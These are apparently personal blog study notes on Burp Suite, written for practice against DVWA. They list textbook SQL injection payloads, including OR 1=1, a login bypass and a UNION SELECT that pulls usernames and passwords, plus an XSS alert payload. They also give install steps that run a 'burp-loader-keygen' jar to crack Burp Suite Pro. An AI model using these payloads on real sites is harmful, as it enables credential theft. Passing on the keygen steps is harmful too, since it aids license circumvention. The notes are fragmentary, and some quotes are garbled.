Meow's Testing Tools - Burpsuite
[toc]
Burpsuite
test web: www.dvwa.co.uk
Testing workflow
SQL injection
UPDATE, INSERT, SELECT, ORDER BY
- retrieve hidden data:
- input: Gifts
https://web/products?category=Gifts
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
- input: Gifts’–
https://web/products?category=Gifts'--
SELECT * FROM products WHERE category = 'Gifts'
–’ AND released = 1- input: Gifts
'+OR+1=1--
https://web/products?category=Gifts'+OR+1=1--
SELECT * FROM products WHERE category = 'Gifts' OR 1=1
–’ AND released = 1
- subverting application logic
GET /web3/login/?id=1&Submit=Submit HTTP/1.1
GET /web3/login/?id=1'OR 1=1 #
&Submit=SubmitHTTP/1.1
GET /web3/login/?id=1'+OR+1+%3d+1+%23&
Submit=SubmitHTTP/1.1
- input: admin 12345
SELECT * FROM user WHERE username = 'admin' AND password = '12345'
- input: admin’–
SELECT * FROM user WHERE username = 'admin'
–’ AND password = ‘12345’
- retrieve data from other database tables
- input: Gifts
SELECT name, description FROM products WHERE category = 'Gifts'
- input: Gifts’ UNION SELECT username, password From users–
SELECT name, description FROM products WHERE category = 'Gifts' UNION SELECT username, password From users
–
- examining the database
- oracle:
SELECT * FROM v$version
- list the table and database:
SELECT * FROM information_schema.tables
- oracle:
- blind SQL injection vulnerabilities
detecting SQL injection vulnerabilities: use scanner
lab:
1
2
3
https://abc.net/filter?category=Lifestyle' UNION SELECT NULL,NULL,NULL--
XSS Exploitation
- execute payload as
<script>alert(“hello”)</script>
install burpsuite
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Install homebrew
rm -rf /Library/Java/JavaVirtualMachines/adoptopenjdk-14.jdk
# Tap homebrew/cask-versions
brew tap homebrew/cask-versions
# install java8:
brew cask install adoptopenjdk8
# Check if java8 is successfully installed or not
/usr/libexec/java_home -verbose
# cd to the file
cd /Applications/Burp\ Suite\ Community\ Edition.app/Contents/java/app
# Window1:
/Library/Java/JavaVirtualMachines/adoptopenjdk-14.jdk/Contents/Home/bin/java -jar burp-loader-keygen-2_1_07.jar
-jar burp-loader-keygen.jar
# add file
-Xbootclasspath/p:burp-loader-keygen-2_1_07.jar
# Window2:
/Library/Java/JavaVirtualMachines/adoptopenjdk-14.jdk/Contents/Home/bin/java -jar burpsuite_pro_v2.1.07.jar
/Library/Java/JavaVirtualMachines/liberica-jdk-8.jdk/Contents/Home/bin/java -jar burpsuite_pro_v1.7.31
# Create a Bash Alias
# If you are missing a .bash_profile
burp2.1()
{
/Library/Java/JavaVirtualMachines/adoptopenjdk-14.jdk/Contents/Home/bin/java -jar /Applications/Burp\ Suite\ Community\ Edition.app/Contents/java/app/burpsuite_pro_v2.1.07.jar
}
# Run
source ~/.bash_profile
# or
source ~/.zshrc
# Now you can type burp2.1 in terminal to open Burp Suite directly
.
This post is licensed under CC BY 4.0 by the author.
Comments powered by Disqus.